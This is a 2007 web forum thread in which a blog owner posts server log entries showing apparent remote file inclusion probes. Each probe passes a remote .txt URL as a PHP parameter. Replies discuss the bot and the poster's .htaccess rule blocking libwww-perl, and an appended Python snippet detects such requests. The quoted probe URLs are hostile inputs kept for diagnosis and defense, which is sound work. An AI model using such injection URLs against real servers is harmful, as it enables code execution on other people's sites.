Weird HTTP Requests in Server Logs
I have had some weird requests on my blog. I use WordPress with Quick Stats that gives me some simple traffic information. Here are a few that raise some flags.
URL: /port.php?content=http://www.ilegais.110mb.com/ilg.txt?
Date: 2007-Oct-01 20:12:46
Referer:
IP: 85.214.59.8
Host: xtommmik.com
Browser: libwww-perl/5.803
URL: /index.php?topic=http://www.ilegais.110mb.com/did.txt?
Date: 2007-Oct-01 19:34:03
Referer:
IP: 87.106.179.35
Host: idlp-hosting.de
Browser: libwww-perl/5.805
URL: /index.php?var=http://www.ilegais.110mb.com/ilg.txt?
Date: 2007-Oct-01 16:37:33
Referer:
IP: 85.214.59.8
Host: xtommmik.com
Browser: libwww-perl/5.803
Until I figure out what these requests are about, I am blocking all requests with this user agent by putting this in my .htaccess file:
RewriteCond %{HTTP_USER_AGENT} (libwww-perl) [NC]
RewriteRule .* - [F]
I'm assuming that somebody is up to no good, but does anybody know what this is? I tried loading these files in the HTTP request, but they don't exist anymore.
I saw similar requests on a different site I did several months ago (totally from scratch with no existing CMS), so I don't think this is related to WordPress.
Busy posted this at 09:51 — 2nd October 2007.
He has: 6,151 posts
Joined: May 2001
if you go to ilegais.110mb.com it shows not found
blocking libwww-perl is blocking a lot of people/bots, you'd be better off blocking the IPs but would still be blocking a few
if you get these, report the site to the host, in this case would be 110mb.com
pr0gr4mm3r posted this at 16:34 — 2nd October 2007.
He has: 1,502 posts
Joined: Sep 2006
Do you have any examples? I checked my logs before I did this, and I did not find any other instance of this user agent...in bots or regular visits.
JeevesBond posted this at 19:41 — 2nd October 2007.
He has: 3,956 posts
Joined: Jun 2002
I'm sure libwww-perl would be quite widely used, it's a Perl library. Although if you haven't seen any other instance of it in your logs then it probably won't hurt to block it (just remember that in a few years' time when a bot is trying to crawl your site or something!)
That looks like a bot designed to use a security exploit in some application. Maybe a cross-site scripting vulnerability, or perhaps whatever file is passed to the 'content' variable is eval()'d. You've probably not got the software installed, but that won't stop the bot from trying. It's probably trawling a number of sites.
a Padded Cell our articles site!
greg posted this at 00:23 — 3rd October 2007.
He has: 1,581 posts
Joined: Nov 2005
Do you have people able to post links on your site?
if so then it may just have been someone providing a link to their site as 110mb is free hosting site
and the "ilegais" is obviously the standard freebie subdomain given by 110mb
as the site has been removed foul play may have been happening,
but not much can be done from a link merely to a .txt file
send 110mb an email and ask if the site was removed from their servers for dodgy activity
pr0gr4mm3r posted this at 00:47 — 3rd October 2007.
He has: 1,502 posts
Joined: Sep 2006
I actually just got another hit, this one pointing to http://71.102.93.10/WTS/bin/hak/idpitbull.txt. The code doesn't look to do anything harmful in itself. It seems to output some information of the server that it's on. Don't know what that information can be used for, but I'm pretty sure it's not anything good.
greg posted this at 01:33 — 3rd October 2007.
He has: 1,581 posts
Joined: Nov 2005
Ouch
I'm doing some more digging but it certainly looks like a hack code
http://www.yugatech.com/blog/the-internet/hack-attack-in-progress/
search google for - echo "mic22" - it might come to nothing, but I suppose it depends on your site set up
you should do a full read of all your server logs
pr0gr4mm3r posted this at 13:40 — 3rd October 2007.
He has: 1,502 posts
Joined: Sep 2006
Ya, it doesn't look like anything good. I'm going to leave that htaccess code in my file and keep them out. Any bots should have official user agents anyway.
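Added example, not part of any post in this thread: a small log check that flags the trait the quoted requests share (a query parameter whose value is itself an absolute URL) rather than relying on the user agent. The function names are hypothetical, and the field layout is assumed to match the URL / IP / Browser lines quoted in the first post.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# First two records are copied from the first post; the rest are constructed
# controls (one percent-encoded probe, two benign requests).
SAMPLE = """\
URL: /port.php?content=http://www.ilegais.110mb.com/ilg.txt?
IP: 85.214.59.8
Browser: libwww-perl/5.803
URL: /index.php?topic=http://www.ilegais.110mb.com/did.txt?
IP: 87.106.179.35
Browser: libwww-perl/5.805
URL: /index.php?var=http%3A%2F%2Fexample.invalid%2Fx.txt%3F
IP: 192.0.2.12
Browser: Mozilla/5.0
URL: /index.php?p=42
IP: 192.0.2.10
Browser: Mozilla/5.0
URL: /?s=http+headers+explained
IP: 192.0.2.11
Browser: Mozilla/5.0
"""

# A parameter value that is itself an absolute URL is the common trait of
# these requests, whatever the parameter name or user agent.
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

def parse_records(text):
    """Group 'Key: value' lines into one dict per request; 'URL' starts a record."""
    records = []
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if not sep:
            continue
        if key == "URL":
            records.append({})
        if records:
            records[-1][key] = value.strip()
    return records

def remote_params(url):
    """Return (name, value) pairs whose decoded value is an absolute URL."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    return [(k, v) for k, v in pairs if REMOTE_URL.match(v)]

def flag(records):
    """Return the records carrying such a parameter, annotated with it."""
    return [{**r, "params": p} for r in records if (p := remote_params(r.get("URL", "")))]

if __name__ == "__main__":
    for hit in flag(parse_records(SAMPLE)):
        print(hit["IP"], hit["Browser"], hit["params"])
```

Legitimate parameters that carry a URL, such as the `redirect_to` parameter on the WordPress login page, will also match, so review the hits before turning them into a block rule.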